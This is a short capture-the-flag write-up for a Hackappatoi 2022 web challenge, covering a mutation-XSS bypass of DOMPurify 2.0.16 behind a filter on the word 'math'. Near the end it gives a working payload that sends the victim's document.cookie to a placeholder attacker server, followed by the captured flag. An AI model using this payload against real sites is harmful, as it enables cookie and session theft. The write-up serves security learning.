Vulnerable to MXSS and tries to filter the word **math**, vulnerable code:
```javascript
function secureQuery(string) {
// let's do this real quick, friends are waiting me at the Drunken Bathrobe
const reg = /math/gi; // nobody likes math
let res = string.replaceAll(reg, "");
res = DOMPurify.sanitize(res);
return res;
}
```
It then runs through Dompurify. Inside the Dockerfile:
```bash
RUN npm i ejs @fastify/view @fastify/formbody @fastify/static
[email protected] jsdom
```
Dompuriy 2.0.16 is vulnerable, change from v2.0.16 -> v2.0.17
https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17#diff-f44bc3a1bfaa31000b8f4f1359dba82a
```
"title": "Tests against nesting-based mXSS behavior 2/2",
"payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>",
```
MXSS Reading, specifically Dompurify
- https://portswigger.net/daily-swig/dompurify-mutation-xss-bypass-achieved-through-mathml-namespace-confusion
- https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/
Tools to test
- https://livedom.lab.xss.academy/
Code for the backend check
```javascript
const cookies = [
{
name: "flag",
value: process.env.FLAG,
},
];
async function checkReport(query) {
const browser = await puppeteer.launch(browser_options);
try {
const page = await browser.newPage();
const urlToVisit = "http://127.0.0.1:1337/search?query=" + query;
console.log("URL to visit:", urlToVisit);
await page.goto("http://127.0.0.1:1337/");
await page.setCookie(...cookies);
await page.goto(urlToVisit, {
waitUntil: "networkidle0",
timeout: 10000,
});
await browser.close();
} catch {
await browser.close();
}
}
```
Final payload that evades the **math** filter and executes a callback to our server with the flag
```payload-final
<maMATHth><mtext><table><mglyph><style><maMATHth><img src=x onerror=document.location='http://YOUR-SERVER/?c='%2bdocument.cookie;></mMATHath>
```
![[Pasted image 20221211011536.png]]
Flag:
```flag
hctf{my_n3w_flag-fl4vor3d_c0ck7ail}
```
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #hackappatoi2022 #xss #mxss #dompurify #web
Related: